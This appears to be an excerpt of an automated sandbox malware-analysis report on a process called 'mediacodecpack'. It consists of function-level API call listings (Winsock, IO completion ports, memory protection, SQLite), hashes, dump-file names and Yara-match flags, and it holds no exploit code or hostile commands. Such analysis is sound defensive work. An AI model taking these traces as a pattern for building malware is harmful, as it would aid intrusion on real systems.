                                                                                • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_mutex_freesqlite3_mutex_leavesqlite3_mutex_try
                                                                                • String ID:
                                                                                • API String ID: 1894464702-0
                                                                                • Opcode ID: 7188b9a67afd66d207271078c150a83da37f36a2752b1b5804700c826a798ba9
                                                                                • Instruction ID: 8ebadd1dc7ee404a0f141fd21885e91e0aa1156a5a6df10951b92a0b718128ce
                                                                                • Opcode Fuzzy Hash: 7188b9a67afd66d207271078c150a83da37f36a2752b1b5804700c826a798ba9
                                                                                • Instruction Fuzzy Hash: CF313C70B086118BDB18DF79C8C1A1A7BFBBFB2704F148468E8418B219EB35DC419F91
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D0D101
                                                                                  • Part of subcall function 02D01A01: TlsGetValue.KERNEL32 ref: 02D01A0A
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D0D180
                                                                                • RtlEnterCriticalSection.NTDLL(?), ref: 02D0D19C
                                                                                • InterlockedIncrement.KERNEL32(02D330F0), ref: 02D0D1C1
                                                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 02D0D1D6
                                                                                  • Part of subcall function 02D027F3: SetWaitableTimer.KERNEL32(00000000,?,000493E0,00000000,00000000,00000000,00000000,00000000,0000000A,00000000), ref: 02D0284E
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalInterlockedSection$EnterExchangeH_prologIncrementLeaveTimerValueWaitable
                                                                                • String ID:
                                                                                • API String ID: 1578506061-0
                                                                                • Opcode ID: 57062f808f059be5a2b708c892473dce8ced86911afd5d6d0f83d5017aac356d
                                                                                • Instruction ID: 966545024f8ea6b118800340b36fa19114552b21151ef0b2dd92f3178d982c65
                                                                                • Opcode Fuzzy Hash: 57062f808f059be5a2b708c892473dce8ced86911afd5d6d0f83d5017aac356d
                                                                                • Instruction Fuzzy Hash: F93113B1D052059FC760DFA8D984BAABBF9FB18310F10455AD849A7780E734AA14CFA1
                                                                                APIs
                                                                                  • Part of subcall function 60925326: sqlite3_log.SQLITE3 ref: 60925352
                                                                                • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,609254CC), ref: 6092538E
                                                                                • sqlite3_mutex_leave.SQLITE3 ref: 609253C4
                                                                                • sqlite3_log.SQLITE3 ref: 609253E2
                                                                                • sqlite3_log.SQLITE3 ref: 60925406
                                                                                • sqlite3_mutex_leave.SQLITE3 ref: 60925443
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                 • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_log$sqlite3_mutex_leave$sqlite3_mutex_enter
                                                                                • String ID:
                                                                                • API String ID: 3336957480-0
                                                                                • Opcode ID: 1198911827aa14b9fab328e6e7c73bc961b2278be0ca20fe6461460b1b30ceeb
                                                                                • Instruction ID: a100dd02d465b32589d57b5b9efe4db3cd483c3b5de54de748c9b161d5d001e2
                                                                                • Opcode Fuzzy Hash: 1198911827aa14b9fab328e6e7c73bc961b2278be0ca20fe6461460b1b30ceeb
                                                                                • Instruction Fuzzy Hash: D3315A70228704DBDB00EF28D49575ABBE6AFA1358F00886DE9948F36DD778C885DB02
                                                                                APIs
                                                                                • sqlite3_result_blob.SQLITE3 ref: 609613D0
                                                                                • sqlite3_column_int.SQLITE3 ref: 6096143A
                                                                                • sqlite3_data_count.SQLITE3 ref: 60961465
                                                                                • sqlite3_column_value.SQLITE3 ref: 60961476
                                                                                • sqlite3_result_value.SQLITE3 ref: 60961482
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                 • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_column_intsqlite3_column_valuesqlite3_data_countsqlite3_result_blobsqlite3_result_value
                                                                                • String ID:
                                                                                • API String ID: 3091402450-0
                                                                                • Opcode ID: 15f5c91e7d752206cb5be57281081ebbda5684d1dfb7c3b21a78c03d1c189b87
                                                                                • Instruction ID: 8b12398a3b1f37ca0d2e1a8d549e1f0529ecbd38da511dd0edd3444da8e5cc4d
                                                                                • Opcode Fuzzy Hash: 15f5c91e7d752206cb5be57281081ebbda5684d1dfb7c3b21a78c03d1c189b87
                                                                                • Instruction Fuzzy Hash: 72314DB19082058FDB00DF29C48064EB7F6FF65354F19856AE8999B361EB34E886CF81
                                                                                APIs
                                                                                • WSASetLastError.WS2_32(00000000), ref: 02D02A3B
                                                                                • closesocket.WS2_32 ref: 02D02A42
                                                                                • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 02D02A89
                                                                                • WSASetLastError.WS2_32(00000000,?,8004667E,00000000), ref: 02D02A97
                                                                                • closesocket.WS2_32 ref: 02D02A9E
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastclosesocket$ioctlsocket
                                                                                • String ID:
                                                                                • API String ID: 1561005644-0
                                                                                • Opcode ID: f08cebc4acdc6c34f046f7ac6f135cd8f415682a62854ee4bbda927eb6970b0e
                                                                                • Instruction ID: 072da88e9c140877765189511b18c6558e2f01c6a9552e43b7922cb712b3d96c
                                                                                • Opcode Fuzzy Hash: f08cebc4acdc6c34f046f7ac6f135cd8f415682a62854ee4bbda927eb6970b0e
                                                                                • Instruction Fuzzy Hash: C621FE71A05205AFEB20ABB9988CB6E77A9DF44319F114969E814C33E1EF708D40CB60
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                 • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                                                                • String ID:
                                                                                • API String ID: 251237202-0
                                                                                • Opcode ID: ee0aefbaff40cad113deb2524f723b57adfc4224f15c8691f87345bc20e459c1
                                                                                • Instruction ID: 8e14962182cb4ba31828fc05f1b37fa5954e33605a362b2e641de35f96add61e
                                                                                • Opcode Fuzzy Hash: ee0aefbaff40cad113deb2524f723b57adfc4224f15c8691f87345bc20e459c1
                                                                                • Instruction Fuzzy Hash: 022137B46087158BC709AF68C48570ABBF6FFA5318F10895DEC958B345DB74E940CB82
                                                                                APIs
                                                                                • sqlite3_aggregate_context.SQLITE3 ref: 6091A31E
                                                                                • sqlite3_value_text.SQLITE3 ref: 6091A349
                                                                                • sqlite3_value_bytes.SQLITE3 ref: 6091A356
                                                                                • sqlite3_value_text.SQLITE3 ref: 6091A37B
                                                                                • sqlite3_value_bytes.SQLITE3 ref: 6091A387
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                 • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_aggregate_context
                                                                                • String ID:
                                                                                • API String ID: 4225432645-0
                                                                                • Opcode ID: e7dd5294350f58c57afd4f2551108a775ab72f2657aaaf635efeb712e258985e
                                                                                • Instruction ID: 24a20a1669ecabf1c8c9e0f75de4e20f6480f0c3e20d7f4799920e66bb4c3c2a
                                                                                • Opcode Fuzzy Hash: e7dd5294350f58c57afd4f2551108a775ab72f2657aaaf635efeb712e258985e
                                                                                • Instruction Fuzzy Hash: 3F21CF71B086588FDB009F29C48075E7BE7AFA4254F0484A8E894CF305EB34DC86CB91
                                                                                APIs
                                                                                • _malloc.LIBCMT ref: 02D1E8B0
                                                                                  • Part of subcall function 02D11FBC: __FF_MSGBANNER.LIBCMT ref: 02D11FD3
                                                                                  • Part of subcall function 02D11FBC: __NMSG_WRITE.LIBCMT ref: 02D11FDA
                                                                                  • Part of subcall function 02D11FBC: RtlAllocateHeap.NTDLL(009D0000,00000000,00000001), ref: 02D11FFF
                                                                                • _free.LIBCMT ref: 02D1E8C3
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap_free_malloc
                                                                                • String ID:
                                                                                • API String ID: 1020059152-0
                                                                                • Opcode ID: f4691c13d370b132a11f7473a25ea9a7f7ca16d64019a3547af858ac957d9d04
                                                                                • Instruction ID: 4652657ff3291c7509e13dae592a6d5144bcf99d4700eaf0d50a5eeade6fd690
                                                                                • Opcode Fuzzy Hash: f4691c13d370b132a11f7473a25ea9a7f7ca16d64019a3547af858ac957d9d04
                                                                                • Instruction Fuzzy Hash: 5111A072908611BACF612F70B804B9A379AEF04374F114A25FE49DAF90DB34CD50DAE8
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D021DA
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D021ED
                                                                                • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000001), ref: 02D02224
                                                                                • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,00000001), ref: 02D02237
                                                                                • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02D02261
                                                                                  • Part of subcall function 02D02341: InterlockedExchange.KERNEL32(?,00000001), ref: 02D02350
                                                                                  • Part of subcall function 02D02341: InterlockedExchange.KERNEL32(?,00000001), ref: 02D02360
                                                                                  • Part of subcall function 02D02341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D02370
                                                                                  • Part of subcall function 02D02341: GetLastError.KERNEL32 ref: 02D0237A
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                                • String ID:
                                                                                • API String ID: 1856819132-0
                                                                                • Opcode ID: 49b349074dcfeb47027e44677928acb775e9eff1b20fae0168bafbae323df864
                                                                                • Instruction ID: 3a15b3662d15217778382da71cdd9077b0b1aef62f705d3bfe99d675cc4a0d26
                                                                                • Opcode Fuzzy Hash: 49b349074dcfeb47027e44677928acb775e9eff1b20fae0168bafbae323df864
                                                                                • Instruction Fuzzy Hash: 8511AF71D01118EBCB159FA4E94CBAEBBBAFF58310F10851AEC55A23A0DB318E51CB90
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D0229D
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D022B0
                                                                                • TlsGetValue.KERNEL32 ref: 02D022E7
                                                                                • TlsSetValue.KERNEL32(?), ref: 02D02300
                                                                                • TlsSetValue.KERNEL32(?,?,?), ref: 02D0231C
                                                                                  • Part of subcall function 02D02341: InterlockedExchange.KERNEL32(?,00000001), ref: 02D02350
                                                                                  • Part of subcall function 02D02341: InterlockedExchange.KERNEL32(?,00000001), ref: 02D02360
                                                                                  • Part of subcall function 02D02341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D02370
                                                                                  • Part of subcall function 02D02341: GetLastError.KERNEL32 ref: 02D0237A
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                                • String ID:
                                                                                • API String ID: 1856819132-0
                                                                                • Opcode ID: 104354ae85df520e753e5a157d59bf60ab8ae4c8976e3a6d9f5e341a85a8254c
                                                                                • Instruction ID: ae67a1d503a73213ec838c55656a44f53a12a438852240147aec121287b6cb3c
                                                                                • Opcode Fuzzy Hash: 104354ae85df520e753e5a157d59bf60ab8ae4c8976e3a6d9f5e341a85a8254c
                                                                                • Instruction Fuzzy Hash: 17115E71D01118EBCB159FA5E848AAEBBBAFF58310F10851AEC04A3760DB714D65DFA0
                                                                                APIs
                                                                                  • Part of subcall function 02D0A169: __EH_prolog.LIBCMT ref: 02D0A16E
                                                                                • __CxxThrowException@8.LIBCMT ref: 02D0AD33
                                                                                  • Part of subcall function 02D131CA: RaiseException.KERNEL32(?,?,02D0EB63,?,?,?,?,?,?,?,02D0EB63,?,02D2ECA8,?), ref: 02D1321F
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,02D2FA1C,?,00000001), ref: 02D0AD49
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 02D0AD5C
                                                                                • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000001,00000000,?,?,?,02D2FA1C,?,00000001), ref: 02D0AD6C
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D0AD7A
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExchangeInterlocked$CompletionExceptionException@8H_prologObjectPostQueuedRaiseSingleStatusThrowWait
                                                                                • String ID:
                                                                                • API String ID: 2725315915-0
                                                                                • Opcode ID: 43e5fa743877a6efe05c2dd80ba0284775008764a9538acecbbcc2d1c201025b
                                                                                • Instruction ID: 7c69e4aac91e9b391e8f3a72fe93f94bc06e8ac39a9f500ee97bd29ea813fd09
                                                                                • Opcode Fuzzy Hash: 43e5fa743877a6efe05c2dd80ba0284775008764a9538acecbbcc2d1c201025b
                                                                                • Instruction Fuzzy Hash: 5101D1B2A00304AFDB149BA4ECC9F8A77ACEB04365B504814F611D63A0EB60EC08CB60
                                                                                APIs
                                                                                • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02D02432
                                                                                • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02D02445
                                                                                • RtlEnterCriticalSection.NTDLL(?), ref: 02D02454
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 02D02469
                                                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 02D02470
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalExchangeInterlockedSection$CompareCompletionEnterLeavePostQueuedStatus
                                                                                • String ID:
                                                                                • API String ID: 747265849-0
                                                                                • Opcode ID: c220d22f52e970a691ab14d239dd3c69ceee11cd0eaf9824cbb5bb5c36cc5f02
                                                                                • Instruction ID: 4c782c54a268e7693621a6a526583f239b78fd026c5fb49e6cd7c50baca1e066
                                                                                • Opcode Fuzzy Hash: c220d22f52e970a691ab14d239dd3c69ceee11cd0eaf9824cbb5bb5c36cc5f02
                                                                                • Instruction Fuzzy Hash: 87F04972641204BBD6249AA0EE8DFE6B72CFB14711F904411F701D6280D761E928CAE4
                                                                                APIs
                                                                                • InterlockedIncrement.KERNEL32(?), ref: 02D01ED2
                                                                                • PostQueuedCompletionStatus.KERNEL32(?,?,?,00000000,00000000,?), ref: 02D01EEA
                                                                                • RtlEnterCriticalSection.NTDLL(?), ref: 02D01EF9
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 02D01F0E
                                                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 02D01F15
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalInterlockedSection$CompletionEnterExchangeIncrementLeavePostQueuedStatus
                                                                                • String ID:
                                                                                • API String ID: 830998967-0
                                                                                • Opcode ID: 9f434ad9029a0737e7260175841ad9b83b19fb78aec652a1177bcce5143b8c12
                                                                                • Instruction ID: a6f3aae5975f58be763aa01e900bf31eca5d121e20247b57bf2041711bfe302f
                                                                                • Opcode Fuzzy Hash: 9f434ad9029a0737e7260175841ad9b83b19fb78aec652a1177bcce5143b8c12
                                                                                • Instruction Fuzzy Hash: E6F06772640604BBD714AFA0FE88FD6BB6CFF28711F900412F20186680D761E968CBE0
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                 • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_log
                                                                                • String ID: ($string or blob too big$|
                                                                                • API String ID: 632333372-2398534278
                                                                                • Opcode ID: 03236f3895d5fd10e60d1ff1eefb6ed02231b27a1c47450c0fb49d2dd58edd91
                                                                                • Instruction ID: 3c3a64a58f66130c0c9aec06ea77be0954bd7b4098f3428da06b6372deec6608
                                                                                • Opcode Fuzzy Hash: 03236f3895d5fd10e60d1ff1eefb6ed02231b27a1c47450c0fb49d2dd58edd91
                                                                                • Instruction Fuzzy Hash: 5DC10CB5A043288FCB66CF28C981789B7BABB59304F1085D9E958A7345C775EF81CF40
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _memmove
                                                                                • String ID: invalid string position$string too long
                                                                                • API String ID: 4104443479-4289949731
                                                                                • Opcode ID: 9e29c566c89c6c3bd0ae19069c205bc2b93b109c93f10716ec42196baf01d8be
                                                                                • Instruction ID: 3b836418e2fcb3b1c72ba5e18804b5dded88a215f478287914c7254a32e19558
                                                                                • Opcode Fuzzy Hash: 9e29c566c89c6c3bd0ae19069c205bc2b93b109c93f10716ec42196baf01d8be
                                                                                • Instruction Fuzzy Hash: 1E418231700304ABE7349E69D8C4B6AF7AAEB81754B10492DE856CB7E1C770FC05CBA5
                                                                                APIs
                                                                                • WSASetLastError.WS2_32(00000000), ref: 02D030C3
                                                                                • WSAStringToAddressA.WS2_32(?,?,00000000,?,?), ref: 02D03102
                                                                                • _memcmp.LIBCMT ref: 02D03141
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressErrorLastString_memcmp
                                                                                • String ID: 255.255.255.255
                                                                                • API String ID: 1618111833-2422070025
                                                                                • Opcode ID: 900c88ef90237997ec1ef7e9efc453060f9a62319f6a862df1cca8b7093165cd
                                                                                • Instruction ID: 76fb3671526b33db02796c21bb12f4d9d321b11f90d2aac748424a5b1f31d81f
                                                                                • Opcode Fuzzy Hash: 900c88ef90237997ec1ef7e9efc453060f9a62319f6a862df1cca8b7093165cd
                                                                                • Instruction Fuzzy Hash: 6431E1719003049FDB70AF64C8C0B6EB7A6EF49314F2085A9E8659B3E0DB719C41CF91
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                 • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$Protect$Query
                                                                                • String ID: @
                                                                                • API String ID: 3618607426-2766056989
                                                                                • Opcode ID: a11a59528d98c4ff7ad69dfbc7d520f68a8f714e9ef4c31244658d91e7757f1c
                                                                                • Instruction ID: 11fd3fd6c91f2e29dbdaed7331fdf7a08ef8f1da01c53322037319a40d79a89e
                                                                                • Opcode Fuzzy Hash: a11a59528d98c4ff7ad69dfbc7d520f68a8f714e9ef4c31244658d91e7757f1c
                                                                                • Instruction Fuzzy Hash: 003141B5E15208AFEB14DFA9D48158EFFF5EF99254F10852AE868E3310E371D940CB52
                                                                                APIs
                                                                                • sqlite3_malloc.SQLITE3 ref: 60928353
                                                                                  • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
                                                                                • sqlite3_realloc.SQLITE3 ref: 609283A0
                                                                                • sqlite3_free.SQLITE3 ref: 609283B6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                 • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_realloc
                                                                                • String ID: d
                                                                                • API String ID: 211589378-2564639436
                                                                                • Opcode ID: 4c34ce46e3d0a3d1d3def0d8ad382c8948c40f702370fc4fcdce263753dde11a
                                                                                • Instruction ID: 0830c2115c9ea807631a831f7f1165b0ee40d8a8a94356aa67113494a68d5982
                                                                                • Opcode Fuzzy Hash: 4c34ce46e3d0a3d1d3def0d8ad382c8948c40f702370fc4fcdce263753dde11a
                                                                                • Instruction Fuzzy Hash: 222137B0A04205CFDB14DF59D4C078ABBF6FF69314F158469D8889B309E3B8E841CBA1
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D01F5B
                                                                                • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,00000000), ref: 02D01FC5
                                                                                • GetLastError.KERNEL32(?,00000000), ref: 02D01FD2
                                                                                  • Part of subcall function 02D01712: __EH_prolog.LIBCMT ref: 02D01717
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$CompletionCreateErrorLastPort
                                                                                • String ID: iocp
                                                                                • API String ID: 998023749-976528080
                                                                                • Opcode ID: 284406cfe59b189eaf80888e0015bc694c0cd2050e9f61da1bc548c94c06baa0
                                                                                • Instruction ID: e5e46ec4a632056f8a35d87816d9e2d5e6eb4902bea5f01ac83d6a7df726531f
                                                                                • Opcode Fuzzy Hash: 284406cfe59b189eaf80888e0015bc694c0cd2050e9f61da1bc548c94c06baa0
                                                                                • Instruction Fuzzy Hash: 3521C6B1801B449FC720DF6A954455AFBF8FFA4720B108A5FA4A683BA0D7B0A9048F91
                                                                                APIs
                                                                                • _malloc.LIBCMT ref: 02D127DD
                                                                                  • Part of subcall function 02D11FBC: __FF_MSGBANNER.LIBCMT ref: 02D11FD3
                                                                                  • Part of subcall function 02D11FBC: __NMSG_WRITE.LIBCMT ref: 02D11FDA
                                                                                  • Part of subcall function 02D11FBC: RtlAllocateHeap.NTDLL(009D0000,00000000,00000001), ref: 02D11FFF
                                                                                • std::exception::exception.LIBCMT ref: 02D127FB
